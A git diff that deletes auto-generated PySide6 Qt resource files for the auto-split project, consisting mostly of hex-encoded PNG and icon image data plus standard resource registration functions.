-\x08\x3f\x0c\xd9\xb3\x5a\x15\x0e\x6c\x15\x82\x5f\x28\xd6\xf8\xf7\ -\xb5\x69\xdc\x2c\x4d\x14\xea\x35\x76\xf5\x2f\x44\x5c\x82\xac\x84\ -\xc5\x53\x96\x82\x32\x14\x94\xc5\x53\x86\xa2\xb2\xb8\xd2\xe2\x2a\ -\x8b\xc0\x22\xc5\xf9\xa3\xd8\x8c\x15\x68\x13\xc7\xed\x91\x16\x04\ -\x46\x10\x68\x11\x0b\xbf\x16\x84\x56\x10\x19\x41\xd4\x51\x0e\x76\ -\xb5\x5b\xc2\x90\xbd\x44\x17\xe1\x37\x60\xf9\x14\x67\x82\x36\x3f\ -\x27\xe0\x8f\x87\xc5\xf2\x77\x19\xba\x67\xb7\x2a\x1c\x98\x12\x82\ -\xb7\x78\x15\xfe\xc3\xc8\x34\xe5\x2c\xcd\x12\x48\x02\x7b\xc9\x2f\ -\xb8\xe0\x69\x5f\xb2\xd5\xb8\x56\xac\x20\xd6\xfc\xe5\x86\xa1\xb5\ -\x04\xf5\x33\x3c\x19\xfa\xfc\x82\x80\x77\x22\x08\x87\x49\xf8\x61\ -\x88\x9f\xeb\xcc\x7b\x66\xb1\x50\x15\xf0\x26\xaf\xcc\x4f\xd6\xa6\ -\xa8\x79\x95\xb4\x57\x95\x33\x08\x58\x0b\xad\x45\xa8\x9f\xe5\xb1\ -\x28\xe0\xc7\x3b\x5b\x7d\x7a\xd8\x84\x1f\x06\xb0\x12\x70\xbd\x2c\ -\xfc\xe5\x47\x98\xb8\xfb\xae\x00\xb8\x57\x87\x9c\x0d\xdb\x3c\x53\ -\x3a\x8c\xb8\x19\x6d\x20\xca\xc9\x06\x46\xc7\xb5\xfd\x8d\x39\x3e\ -\xab\x43\xfe\xb3\x10\x7c\x18\x30\xc3\x28\xfc\x30\xc4\x0a\x00\x56\ -\x7a\x07\x42\xe0\x3e\xad\x79\x3c\x6a\xf3\x6c\x6b\xd9\xe4\x16\xc9\ -\x47\x77\xe5\x5c\x82\x0e\x61\xf9\x34\x51\x6b\x91\x0f\x1b\xcd\x8f\ -\x61\xf9\x94\x10\xd9\x38\xc2\xab\x5f\x6c\x08\x31\x98\x39\x34\x0b\ -\x02\x61\x0d\x2f\x90\x8a\x5f\x2a\x8f\xf1\xb2\xca\x26\xc4\x20\x95\ -\x0e\xe7\xf4\x97\xa0\x01\xf5\x39\x1a\x7e\x83\x77\x59\xcb\xaf\x60\ -\x79\x52\xc8\xc1\xad\xf0\x5b\x2f\x1b\x42\x01\xc0\x05\x3b\x04\xfb\ -\xa4\xe4\xe7\xbd\x0a\xdf\x52\x9b\xa4\xe4\x96\xd2\x5e\x59\x4e\x9a\ -\x58\x03\xed\x25\xa8\xcf\x71\x22\xf4\xf9\x35\xe0\x9d\xc0\xf2\xa0\ -\xd6\xf6\x5f\x2b\x1b\x46\x01\xc0\x05\x4a\x60\x4c\xc0\x0f\xbb\x25\ -\xde\x5c\xd9\xc4\xa6\x62\x2d\x0f\x09\x36\x22\x3a\x84\xc6\x3c\xb6\ -\xb5\xc8\xa7\x75\xc4\x2f\x0b\xc1\xdf\x32\xe0\xa5\xbd\xd7\xca\x86\ -\x7c\xed\x3b\x5b\x85\x9e\x85\x6f\x52\x0e\x3f\x5b\x1e\xe7\x39\x95\ -\x09\x18\x94\x46\xa2\x9c\x1b\x27\x68\x42\xfd\x2c\x75\xbf\xc9\x3d\ -\xd6\xf0\xab\x68\x1e\x45\xc1\x63\xdf\xb6\x71\x84\x1f\x36\xa8\x02\ -\x80\xce\x36\x61\x5c\x3c\xf3\x0c\x29\xf9\xf9\x42\x95\x6f\xa8\x4c\ -\x50\xf4\xca\x69\xaf\x2c\xa7\x9f\x18\x0d\xad\x73\xd8\xe6\x39\x8e\ -\x85\x3e\xff\x9d\xd8\xe5\x5f\xda\x28\x2e\xff\xc5\x6c\x58\x05\x00\ -\x9d\x90\xc0\x00\x82\x4d\xc0\x77\xbb\x05\xde\x54\x1e\x67\x67\x69\ -\x34\xf7\x06\x86\x91\xa0\x05\x8d\x79\x02\xbf\xce\xdf\x19\xcd\xaf\ -\x09\xc1\xa7\x19\xd2\xfd\xfd\xf5\xb2\xa1\x15\x40\x97\x99\x43\xb3\ -\x00\xca\x5a\xbe\x56\x2a\x7e\xa2\x50\xe5\xe5\x95\x71\xbc\xdc\x1b\ -\x18\x0e\x8c\x8e\x0b\x7b\x9a\xe7\x38\x11\xf9\xfc\x9e\xb5\xfc\x11\ -\x96\x53\x1b\x21\xcb\x7f\x35\x72\x05\xd0\x61\xe6\x3d\xb3\x98\xb8\ -\xc9\x66\x5a\xc0\x77\x3b\x05\x7e\xa4\x34\xc6\xee\xd2\x08\x0c\x5b\ -\x43\xd1\x86\xc1\xae\x58\xfd\xb6\x5f\xe7\xc3\xc6\xf0\x3b\xc0\x27\ -\x80\x68\xa3\xc5\xfa\x97\x23\x57\x00\x17\xb1\xf7\x3d\xb1\x37\x00\ -\x3c\x4f\x4a\x7e\xd8\x2d\xf1\xaa\xca\x38\xa3\x85\x2a\xdd\x53\x8a\ -\x72\x06\x80\x28\x80\xd6\x22\xb6\xb5\xc8\xc3\x3a\xe0\xed\x16\xfe\ -\x54\xc0\x9c\xb5\xf0\xd8\xb7\xe7\xc2\xdf\x25\x57\x00\x6b\xb0\xf7\ -\x3d\xb3\xdd\xe6\x98\x0a\x82\x57\x29\x87\x37\x16\x2a\xdc\x59\x1e\ -\xa7\xe0\x95\xc8\xef\x5a\x86\x31\x3a\x9e\xd7\xd7\x3c\xc7\xd9\xb0\ -\xcd\x5f\x5a\xc3\x1f\x00\x5f\x04\x4c\x6e\xf5\x2f\x25\x7f\x95\xaf\ -\xc0\xcc\xa1\x59\xa4\x02\x1d\xb2\x15\xc1\xeb\x1c\x8f\xef\x2f\xd6\ -\xd8\x5f\x1e\x43\x66\xf5\x50\x92\x8d\x8a\x35\xf1\xd6\x5e\xf3\x1c\ -\x6d\xbf\xc1\x3f\x18\xcd\xef\x03\x1f\x05\x5a\xe4\x56\xff\xb2\xe4\ -\x0a\x60\x1d\xcc\xbc\x67\x25\x49\x78\x40\x48\xbe\xcb\x29\x70\x77\ -\xb1\xc6\x4d\xa5\x51\xe4\x30\xcf\x1a\x18\x04\xac\x85\xb0\x05\xad\ -\x45\xa2\x76\x9d\xfb\x4c\xc8\x1f\x5b\xcb\x7b\x11\x9c\xc9\x05\xff\ -\xea\xe4\x0a\xe0\x1a\xd8\xfb\x17\xb3\x10\x4f\x52\x7e\x86\x90\x7c\ -\x9f\x5b\xe4\x9b\x8b\x35\xb6\x15\x6b\x88\xdc\x23\x48\x16\x6b\xe3\ -\xc3\x38\xdb\x4b\xe8\xf6\x32\x87\x75\xc8\x9f\x5a\xc3\x21\x6b\x38\ -\x26\x24\x36\x17\xfc\xf5\x91\x2b\x80\xeb\xa0\xa3\x08\x0a\xc0\x1d\ -\x42\xf2\x9d\x6e\x91\x57\x17\xab\xec\x28\x8e\x20\x94\x97\x97\x15\ -\xf7\x13\x6b\x62\x8b\xdf\x5e\x26\x6a\xd7\x79\x50\x87\xdc\x63\x0d\ -\xf7\x00\x8f\x00\x26\x17\xfc\x6b\x23\x7f\x55\xaf\x93\xce\xc0\x11\ -\x00\x0f\xcb\x33\x85\xe4\x75\x4e\x81\x7f\x57\x28\x33\x53\x1c\xc5\ -\xc9\x5b\x8e\x7b\x8b\xd1\x71\xc7\x5e\x7b\x99\x66\xd0\xe4\x4b\x3a\ -\xe4\x90\xb5\x7c\xc8\x5a\x8e\x08\x91\x0b\xfe\xf5\x92\xbf\xa2\x3d\ -\x60\x55\x68\x30\x23\x24\xaf\x51\x2e\xdf\xe2\x95\xb9\xb5\x58\x8d\ -\x4b\x8b\x87\x61\x3a\x71\x1a\x58\x0b\x3a\x88\xe7\xf2\xf9\x75\xce\ -\x86\x6d\x3e\xa3\x23\xfe\x02\xcb\xc7\x80\xa7\x20\x77\xf5\x6f\x94\ -\x5c\x01\xf4\x90\x8e\x22\x90\xc0\x76\x04\x2f\x53\x8a\xff\xcb\x29\ -\xf2\xb5\xc5\x1a\x9b\xbc\x32\x38\x85\xdc\x2b\x58\x0f\x3a\x8a\xdd\ -\x7c\xbf\x41\x10\x34\xf9\x8a\x0e\xf8\x98\xd1\xfc\x15\xf0\x39\x60\ -\xc1\x5a\x78\xfc\x75\xb9\xe0\xf7\x82\xfc\x75\xec\x03\x7b\xfe\x6c\ -\x16\xe5\x82\x8e\xa8\x09\xc1\xf3\x84\xe2\xdf\x3a\x2e\xaf\x70\x4b\ -\xec\x2b\x54\x28\x77\xbd\x82\x5c\x19\x9c\xc7\x68\x88\xda\xe0\x37\ -\x31\x41\x93\xa7\x23\x9f\xcf\x98\x88\xbf\xb1\x96\x8f\x5b\xc3\x51\ -\x21\x88\x16\x16\x61\xe1\x87\x72\xc1\xef\x25\xf9\x2b\xd8\x67\xf6\ -\xfc\x79\xbc\x85\x28\x04\xdb\x11\xbc\x50\x2a\x5e\xe5\x14\x78\xae\ -\x5b\x64\x97\x57\xc6\x73\x8b\x71\xa9\xf1\x46\x54\x06\x26\x82\xd0\ -\x87\xb0\x85\x0e\x9a\xcc\x87\x3e\xf7\x9b\x88\x7f\xb0\x86\xbf\xb7\ -\x96\x07\xdd\x32\xf5\xe5\x13\x70\xf2\x47\x72\xa1\xef\x17\x1b\xf0\ -\xb5\x4b\x87\xdd\xef\x9e\xc5\x2d\x41\xe4\x53\x02\x76\x09\xc9\x0b\ -\xa4\xe2\xc5\x8e\xc7\x57\x3b\x05\x76\x79\x25\xaa\x4e\x11\x1c\xb7\ -\xd3\x89\x38\x84\x4f\xc6\x9a\xd8\xd2\x87\x6d\x08\xdb\x44\x41\x8b\ -\x53\x91\xcf\x97\x3b\x42\xff\x2f\xd6\xf2\x80\xd1\x2c\x08\x09\x47\ -\xbf\x23\x17\xfa\x24\x10\x36\x1e\x91\xb3\x72\xee\xa4\xd8\x88\xa6\ -\x28\x61\x76\xfe\xd1\x2c\xc5\x09\x08\x9b\x78\x42\xb0\x5d\x48\x9e\ -\x21\x25\xcf\x97\x0e\xcf\x56\x2e\xb7\xba\x05\x36\xbb\x25\x8a\x8e\ -\xd7\xf1\x0e\xd4\x60\x7a\x08\xd6\xc6\x56\x3e\x0a\x20\xf2\x31\x61\ -\x9b\x46\xe4\x73\x4c\x87\x7c\xd1\x68\x3e\x61\x0d\xf7\x5a\xcb\xc3\ -\x58\x96\x11\xd8\x3c\xae\x4f\x9e\xae\x02\xe8\xf6\xbb\x85\xb9\x02\ -\x48\x9e\x9d\xef\x98\x45\x87\x88\x42\x85\x2a\x82\x5d\x42\xf2\x0c\ -\xa9\xb8\x53\x2a\x6e\x57\x2e\x7b\x95\xcb\x66\xb7\x40\x55\x79\x28\ -\xc7\x8b\x3d\x84\xac\x29\x05\x6b\xe2\x2f\x1d\xc5\xa3\xb6\x22\x9f\ -\x28\x0a\xa8\xeb\x80\x13\x3a\xe4\x51\xa3\xb9\xd7\x18\xee\xb7\x86\ -\xc3\x58\x9e\x1e\xdf\x45\xfb\xe4\x03\x70\xf2\x07\x73\xa1\x4f\x92\ -\x4b\x0c\xbe\xb5\x17\x1e\x09\x93\x2b\x80\xf4\xb9\xe9\x5d\xb3\x04\ -\x4d\x44\xa1\x46\x55\x08\xa6\x84\x64\x46\x48\x0e\x4a\xc5\x33\xa4\ -\xc3\x8c\x74\xd8\xa5\x1c\xc6\x94\x4b\x4d\xb9\x78\xca\x41\x48\xa7\ -\xa3\x18\x64\xe7\x0b\x2e\x7f\xba\x27\x6b\xfc\x39\x5c\xfe\x24\x51\ -\xdb\x39\x14\xd4\xc4\x56\xbd\xeb\xca\x9b\x08\x4c\x84\xd5\x11\x2d\ -\x1d\xd0\xd0\x11\x67\x75\xc4\x13\x56\xf3\x15\xa3\x79\xd8\x1a\xbe\ -\x6c\x2d\x8f\x59\xc3\x19\x6b\x68\x02\x1c\x7b\x43\x2e\xf0\x69\xd2\ -\x91\x77\x8f\xf8\x91\x86\xb9\xb4\x0f\x00\x9b\x7f\x77\x96\xe9\xdb\ -\x60\xf9\x04\x2e\x82\xb2\x90\x4c\x0a\xc1\xb4\x10\xdc\x24\x24\x3b\ -\x84\x64\xaf\x54\x6c\x93\x8a\x2d\x52\x31\x26\x14\xa3\x52\x51\x90\ -\x0a\x4f\x48\x1c\x29\x51\x48\xa4\x10\x48\x21\x38\x7f\xa6\xdf\xaa\ -\xf3\x01\xbb\x42\x8e\xc5\x58\x83\xb5\xf1\xff\xb5\x35\x44\x46\x13\ -\x5a\x43\xdb\x68\xea\x46\xb3\x64\x35\xf3\xc6\x32\x67\x35\x27\xac\ -\xe1\x29\x63\x38\x6a\x2d\x27\x30\x3c\x6d\x2d\x0b\x61\x8b\xfa\xa9\ -\x07\x30\x13\xbb\xe1\xf4\x8f\xe5\x02\x9f\x25\x2e\x31\xf8\x69\x2f\ -\x28\xe7\xfa\x99\xfc\xad\x59\x96\x4e\xc3\xe6\xfd\x38\xd2\xa1\x28\ -\x04\x35\x21\x18\x45\x30\x21\x04\xe3\x42\x32\x06\x8c\x0a\xc9\x38\ -\x50\x15\x82\x32\x82\xa2\x88\x43\x3e\x85\x40\x60\xe3\x83\x80\x01\ -\x1f\x8b\x01\x9a\xd6\xd2\xc6\xb2\x64\xa1\x8e\xe1\x9c\xb5\x9c\x03\ -\xce\x59\xcb\x92\x35\x2c\x5a\xcb\xb2\x35\xf8\x3a\x20\xd8\xf7\x0a\ -\xcc\xa7\xff\x27\xb4\x7e\x39\x17\xf4\x41\xe4\xff\x00\x21\xbf\xbf\ -\x45\xaa\x78\x3d\x13\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\ -\x82\ -" - -qt_resource_name = b"\ -\x00\x09\ -\x0a\x6c\x78\x43\ -\x00\x72\ -\x00\x65\x00\x73\x00\x6f\x00\x75\x00\x72\x00\x63\x00\x65\x00\x73\ -\x00\x10\ -\x0a\x2c\xb7\x07\ -\x00\x64\ -\x00\x6f\x00\x6e\x00\x61\x00\x74\x00\x65\x00\x62\x00\x75\x00\x74\x00\x74\x00\x6f\x00\x6e\x00\x2e\x00\x70\x00\x6e\x00\x67\ -\x00\x08\ -\x0a\x61\x42\x7f\ -\x00\x69\ -\x00\x63\x00\x6f\x00\x6e\x00\x2e\x00\x69\x00\x63\x00\x6f\ -" - -qt_resource_struct = b"\ -\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\ -\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x02\ -\x00\x00\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\ -\x00\x00\x00\x3e\x00\x00\x00\x00\x00\x01\x00\x00\x3b\x83\ -" - -def qInitResources(): - QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data) - -def qCleanupResources(): - QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data) - -qInitResources() diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$resources_rc.py.target.py b/v1/data/codefile/toufool@auto-split__86244b6__src$resources_rc.py.target.py deleted file mode 100644 index 0131ce6..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$resources_rc.py.target.py +++ /dev/null @@ -1,3089 +0,0 @@ -# Resource object code (Python 3) -# Created by: object code -# Created by: The Resource Compiler for Qt version 6.1.2 -# WARNING! All changes made in this file will be lost! - -from PySide6 import QtCore - -qt_resource_data = b"\ -\x00\x00\x3b\x7f\ -\x89\ -\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\ -\x00\x00\xaa\x00\x00\x00\x51\x08\x06\x00\x00\x00\x42\x23\x3d\x58\ -\x00\x00\x00\x01\x73\x52\x47\x42\x00\xae\xce\x1c\xe9\x00\x00\x00\ -\x04\x67\x41\x4d\x41\x00\x00\xb1\x8f\x0b\xfc\x61\x05\x00\x00\x00\ -\x09\x70\x48\x59\x73\x00\x00\x0e\xc3\x00\x00\x0e\xc3\x01\xc7\x6f\ -\xa8\x64\x00\x00\x00\x1a\x74\x45\x58\x74\x53\x6f\x66\x74\x77\x61\ -\x72\x65\x00\x50\x61\x69\x6e\x74\x2e\x4e\x45\x54\x20\x76\x33\x2e\ -\x35\x2e\x31\x31\x47\xf3\x42\x37\x00\x00\x3a\xee\x49\x44\x41\x54\ -\x78\x5e\xed\x9d\x07\x58\x54\xc7\xfa\xc6\xaf\x08\x48\xb7\xd7\x98\ -\xd8\x3b\x8a\xbd\x25\x31\xd1\x68\x62\xef\xe9\x76\xa5\x28\x2a\x8a\ -\x25\xb1\xc4\x24\xc6\xc4\x2e\x02\x8a\xd8\x7b\x62\x49\xec\x5d\xec\ -\xdd\xd8\xa5\x48\x11\xc5\x4e\xef\xb0\xc0\xee\x79\xff\xef\xcc\xee\ -\x52\x96\x45\x89\xc9\xbd\xe6\xff\x3c\x4c\x9e\xdf\x9d\x39\x33\xdf\ -\xcc\x99\x73\xe6\x9d\x6f\x66\x76\x57\xee\x7f\x8a\x42\x51\x28\x0a\ -\x45\xa1\x28\x14\x85\xa2\x50\x14\x8a\x42\x51\x28\x0a\x45\xa1\x28\ -\xbc\x81\x90\xb5\xae\xa3\xa5\xb2\xe1\xa3\x32\xca\x7e\x97\xcd\x59\ -\x1b\xbb\x6d\x56\x96\x54\xdf\xac\x78\xd6\xd9\x0c\x8f\xda\x9b\xe1\ -\x49\x96\xbe\x26\x9e\xb5\x48\xcd\xbc\x18\xb3\xcb\x07\xeb\x2d\x15\ -\xb6\xb9\x11\x79\x85\xb1\x33\xb4\x31\x86\x91\x7a\x86\xfd\x2c\x74\ -\x5f\x49\xbe\xba\xc6\xfa\xfa\xba\xb0\x2d\xc3\xf6\x8d\xbe\x8b\x7f\ -\x0e\x45\xf7\x7e\x94\xa5\x75\x36\x2b\xab\xda\x6e\xd6\xec\x1d\xb5\ -\x19\xfb\x5d\x9a\x2a\xab\xdb\x5b\x2b\x9b\xbb\xeb\x54\xf3\x3f\x0c\ -\x58\xf3\x6e\x57\x76\xcc\x5d\xb3\xa2\xf9\x0b\x65\x69\x4d\xb0\x83\ -\xc0\xd2\x1a\x50\xbc\xea\x40\x23\xae\x3d\xc5\x75\x6d\xc6\xc6\x10\ -\xe5\xb9\xa9\x45\x0c\x6d\x44\x9e\x21\x06\x36\x6c\x5f\xdc\x23\x3f\ -\xe2\xde\xb9\x29\x8c\x4d\x41\xd4\x34\x40\xe4\x19\x6b\xef\xff\x0b\ -\xf9\x9f\xa9\x50\xef\xba\x90\x70\xa2\xc9\x71\xd1\xea\x81\x6d\x33\ -\x56\xa8\x0b\xac\x68\x06\x78\xd5\xff\x46\xe3\xdb\x6e\xa8\x4e\x42\ -\xff\xbd\x80\xcd\x9d\x4d\xb0\xaa\x6d\x27\x2c\x6b\x74\x5a\xf1\xac\ -\x9f\x08\x9f\xc6\x50\x36\x76\x04\xf6\x0f\x87\x72\x79\x0e\x94\x9b\ -\x5e\x50\x07\xac\x07\x02\xd6\x92\xf5\x50\x02\xd6\x00\xfe\x1b\xf2\ -\x12\x20\x10\x36\xb9\x59\xf7\x2f\x46\x3c\x8b\x21\xc6\xec\x0c\x31\ -\x56\xcf\x18\xaf\x5b\xaf\x10\xf8\x17\x16\x31\x4e\xc6\x58\xfd\x0a\ -\x8c\xd4\xb9\xcb\x7c\xa2\xdc\x5d\x05\xcd\x2d\x6f\xea\xe2\x27\x28\ -\x47\x5c\xa0\x6c\xee\x02\x8d\x2f\xf5\xe2\x55\x2f\x43\xf1\xae\x17\ -\x02\x9f\xa6\x1f\x63\x43\xc7\x92\x3a\x69\xfd\x73\x41\xd9\xd4\xd1\ -\x8e\x9e\xd3\x5d\x59\xd6\x08\x8a\x8f\x3d\x94\xbd\x5f\x41\xb9\xee\ -\x09\x84\x6c\x87\x3a\x62\x3f\x10\xb1\x0f\x8a\x0e\x0d\xaf\x95\x47\ -\x44\x97\x9f\x1f\x91\xff\x1a\x3c\x64\xdd\x87\x7b\xf3\x62\xac\x7d\ -\x69\xf7\x4f\x61\x70\xbf\xc2\xf2\x60\x8f\x11\x44\x7e\x6e\x8c\xd9\ -\x08\x72\x97\xed\xce\x95\xfe\xab\x88\xba\x86\xec\x82\x12\x6e\xc8\ -\xee\x7c\x20\xfc\x8f\x42\xb2\x2b\x0f\xb2\x3d\x79\x0f\xd1\x8e\x48\ -\xff\x01\x0d\xed\x94\x90\xad\x50\x6e\x2d\x85\x72\xd8\x11\xca\xca\ -\xe6\x50\xbc\x1b\xd0\x03\xd7\xd9\xa8\xac\x7f\xbf\xb4\xb2\x6d\x80\ -\x4e\x65\x7f\x33\x60\x4d\x87\x16\xca\xca\x96\xcf\x15\x0f\xba\xf6\ -\x1d\xbd\x81\x3b\xbe\x14\x84\x10\x0f\x5f\xa8\x1c\x18\xed\xa0\x2a\ -\x4c\x6b\x64\x1e\x1f\x54\xe4\x89\x17\x9e\x7b\xf0\x5e\x85\x7c\xb9\ -\x22\xd6\x91\xcf\x86\xe5\xb9\x11\xf6\xe1\xcc\xcf\x4d\x81\x03\x64\ -\x80\x1c\x0c\x03\x0a\x63\x53\x68\xf2\x0e\xa0\x71\x38\x80\x05\xf2\ -\xbb\x8e\x9d\xb9\xd2\x05\x03\xc1\xfd\xc2\xb0\x93\xb6\x79\xd1\xde\ -\x23\x2f\xd2\xee\xfe\x0e\x5d\x9c\x1b\x91\xa7\x67\xbb\x11\x74\xf9\ -\x61\xdb\xb2\xd3\x8a\x48\x13\x45\xa6\x49\x20\x3d\xee\xae\x2f\xa0\ -\xf1\xae\x0f\xc5\xb7\x19\x94\x35\xed\x7a\xe9\xa4\xf6\xfa\x01\x2b\ -\x9b\x3b\xc0\xb3\x5e\xac\xe2\xd3\x08\x38\x32\x06\x1a\x76\x56\x31\ -\x1c\x50\x3d\x85\x1c\x30\xc3\x41\x91\xf9\x9c\x85\xe0\xec\xd3\x5e\ -\xff\x0d\xee\x0b\x8c\x0d\x50\x5e\x8c\x0e\x76\xbe\x41\x29\x88\xdc\ -\x83\xa5\x45\x31\x24\xac\x30\x70\xd0\xc4\xe0\xe5\x43\x0c\x6a\x0e\ -\x72\xd0\x5f\x9b\xdf\x0a\x81\x91\x7a\xa1\x39\xe5\x0a\xd1\x84\xfd\ -\xaa\xcd\x0b\x65\x1c\xb6\x35\x87\xd0\xd7\x43\x09\xd9\x08\xe5\xec\ -\x64\x28\xdc\xbb\xf2\x5c\x93\xac\xac\x68\xf2\xb5\x4e\x72\x7f\x3d\ -\xa8\x7f\xeb\x59\x57\x59\xd9\xe2\x21\xbc\x1b\x42\x73\x62\x12\x3b\ -\x2c\x44\x9a\x6b\x60\xc5\xcc\xcb\x85\xc2\x41\x7c\x5d\xa4\x00\x64\ -\x1b\x1c\x40\x92\x77\x96\xea\x31\x14\x48\x7e\x1b\x31\xd0\x1a\x0a\ -\x20\x37\x42\x10\xc8\x87\x91\xc1\x29\xb4\x5d\xce\x20\x1a\x43\xd1\ -\x0f\xa8\x21\x46\x6c\x8d\xa1\xd0\xd6\x10\x8d\x01\xc6\x06\xff\x75\ -\x51\x42\xb7\x50\x38\x79\x81\x8c\x37\x33\xde\x2c\xe3\x1c\x36\x11\ -\x8a\x4c\x07\x82\xff\x1a\x39\x75\x37\x40\x09\xe6\x79\xe5\xc2\x6c\ -\xed\x56\x72\xb9\x7d\x82\xf2\x6b\xd7\xae\x3a\xe9\xfd\xb5\xc0\x53\ -\xfc\x4f\xf2\x04\xe8\x37\x51\x27\x20\x31\xf0\x62\x86\x89\xc1\x67\ -\x7c\x3f\x2f\xc6\x5e\xba\x76\x16\xbe\x0a\x0e\x06\x67\xac\xd6\x9b\ -\xe4\xf6\x78\x79\x3d\x6f\x3e\xe8\x3d\x8d\xa1\xf5\xaa\x39\xc8\xfc\ -\x7c\x75\x73\xbc\x6b\xb6\x97\x15\xe8\x26\x61\x81\x18\xd4\x29\x88\ -\x42\xb5\x65\x0c\x83\x76\xfe\x0a\x46\xdb\xfb\x5b\x70\x3c\x42\x29\ -\xce\x60\x1e\x8c\x83\x79\xe8\xba\xc7\xc3\x5e\x3e\x44\x3e\x0f\x51\ -\x7f\x89\xb5\xd0\xb0\xae\xb6\xdd\x0d\xd0\x9c\xfd\x06\xca\x32\x7b\ -\xf1\x69\xd1\x7e\x8d\x67\x6d\x13\x9d\xfc\x0a\x17\xb0\xfa\xfd\xa1\ -\xf0\xae\x97\xa9\xd9\xd9\x97\x9d\xd5\x8b\x91\x4b\x51\x18\x67\x9b\ -\x98\x89\x72\xd6\x69\x67\x9c\x96\x4d\xaf\x8f\x98\x69\x02\x31\xb3\ -\x29\x6e\x29\x5a\x19\x17\x82\x42\x2e\x93\x85\xb5\xcb\x0f\x27\x52\ -\xa1\xc8\x65\xaf\x9f\x80\xf9\x6c\x5e\x8d\xb1\x67\x94\xed\x86\xe6\ -\xc5\xb8\x9d\x31\x44\x9f\x5e\x07\xd1\x26\xc7\x21\x98\x82\x0a\x5c\ -\x05\x25\x68\x25\x10\x50\x00\x81\x3c\xb3\x04\xae\xd0\x21\xd2\x06\ -\x04\x68\x63\x45\xb2\x52\x82\x7b\xa2\xcd\x35\x50\x28\x5a\x45\x88\ -\xf6\xd0\x48\x0a\xb5\x0e\xb0\xba\xcd\x62\x9d\x04\x5f\x1d\xb0\xa2\ -\x71\x71\x78\xd7\xbf\x8b\x95\xad\xa0\xdc\xf4\x64\x87\xb9\x3c\x88\ -\x8e\x8b\x25\x47\x88\x32\x54\x08\x4c\xef\xce\xd7\xe7\x82\xb3\xab\ -\xc0\x99\xf7\x2a\x58\x4f\xb4\x29\x26\x00\x67\x71\xde\x49\xf0\x32\ -\xb4\xcb\x54\x36\xc2\x03\xe8\x26\x92\x86\xc2\xd7\xf6\x55\x94\x89\ -\x7c\x71\x2d\x96\x34\x31\x29\xc4\x12\xc6\xfa\xf2\x5a\x2c\x81\xc2\ -\xce\x48\x7b\x7f\x99\x02\xfa\x65\x0c\xfd\x73\x8a\x58\xf4\x47\xf6\ -\x5d\x57\x57\xa4\xf5\x6d\xe9\xf3\xfe\x32\xda\x36\x5e\x1b\x71\x5f\ -\x21\x26\xff\xe5\x50\x02\x96\x03\x8c\x5f\x85\xb0\x33\x24\xa7\xdc\ -\x87\xd7\x2b\x08\x05\x1b\xc4\xf8\x1e\x45\xcb\xf6\xa5\x87\xbd\xeb\ -\x0d\x6c\xfa\x10\xf0\xaa\xfb\x08\xcb\x1b\xd5\xd5\x49\xf1\xe5\x41\ -\x59\xdb\xae\xbf\x46\x7c\x50\x7b\xc8\x91\x4b\x8a\x98\xbd\xda\x3d\ -\x91\x12\x2c\x1e\x40\x88\x93\x7b\x0b\xbd\xb8\xc4\x8d\x82\x56\x33\ -\xad\x43\xa4\x25\x22\x9f\x0f\x29\x66\x63\x3e\xb4\xb3\x2a\x7b\x76\ -\x89\x3c\xce\x58\xed\xec\xca\x2d\x7c\xde\xe3\x55\xe4\x13\x3c\x97\ -\x13\xc6\xca\x3d\xd1\x47\xb6\xc7\x76\xa4\xb7\x96\xb0\x4d\xd1\xbe\ -\x2c\xd3\xe7\xf3\x25\x85\xb0\x5e\xf6\x33\xfd\x53\x88\xf6\x0c\x31\ -\xb4\x59\x2f\x97\x40\x29\x28\x3e\x8b\xe8\x9f\x5a\xdf\x67\xb9\x44\ -\x8a\x7d\x1c\xdf\xb7\xec\xb3\x61\xdd\xff\x01\xe2\x7d\x89\x31\xba\ -\xeb\x45\x28\x24\xa3\x78\x19\x50\x40\x9e\xff\x32\x89\x14\xae\xf0\ -\xbc\xf4\xc4\x62\xec\x35\x3a\xbd\x88\x71\x57\xce\x4c\x11\x1f\x59\ -\x41\xb3\xa2\xe9\x1c\x9d\x14\x0b\x0e\x38\x39\xab\xb4\xda\xb7\xb9\ -\x9f\xb2\xc2\x1e\x10\xde\x54\xbf\x71\x97\xb3\x4c\xe7\x41\x85\x40\ -\xc5\x8b\x94\x37\x59\x95\x0b\x8a\x2e\x37\x52\x84\x06\xcb\x40\x01\ -\x28\x01\x3e\xac\xa3\x13\xb8\x1c\x24\xa6\x5f\x13\x85\x7d\x51\x82\ -\x57\x53\x04\xe2\x05\x68\xfb\x26\x66\xae\x7c\x29\x6c\x5b\x9b\x2f\ -\xec\xc4\xd2\xa3\x87\x65\xba\xc9\x95\x17\x91\xff\xdf\x41\x91\xf0\ -\xf9\xc5\x24\xd5\x4d\x56\x6d\x3e\xaf\xe5\xbd\xf5\x79\xb9\xdf\xf1\ -\xff\x18\xe1\x15\x29\x36\xc9\x1d\xea\xe1\xb5\xd0\x0a\x5d\xa1\x50\ -\x35\xd2\xeb\xfa\x40\x23\x3c\xab\x98\x04\xbc\x87\x12\xa4\x9d\x18\ -\x1a\x7f\x4f\xc0\x9b\x42\xf5\xb6\x0f\xc7\x89\x1f\x6b\xea\x24\x69\ -\x3c\xa8\xb7\x76\x6f\xcd\x93\x3e\x34\x2b\xeb\x01\x97\xa7\x49\x81\ -\x6a\x67\xbc\xd8\x4b\xea\xbd\x82\xf0\xa4\xe2\x65\xf3\x26\xe2\x66\ -\x42\x68\x3a\xb4\xc2\xd3\xef\x57\x84\x9b\x2f\x0c\x3a\xa1\x0a\x61\ -\xeb\xda\x2d\x2c\x7a\xaf\xac\x47\x7a\x00\xd9\xde\x6a\x2c\xfa\xe9\ -\x07\x7c\x33\x65\x3a\xbe\x15\x4c\x9e\x89\xe9\x53\xbf\x85\xd7\xdc\ -\x1f\x70\x63\xbf\x07\x12\xaf\x73\x19\xca\x5d\xcf\x70\xdf\x25\xc8\ 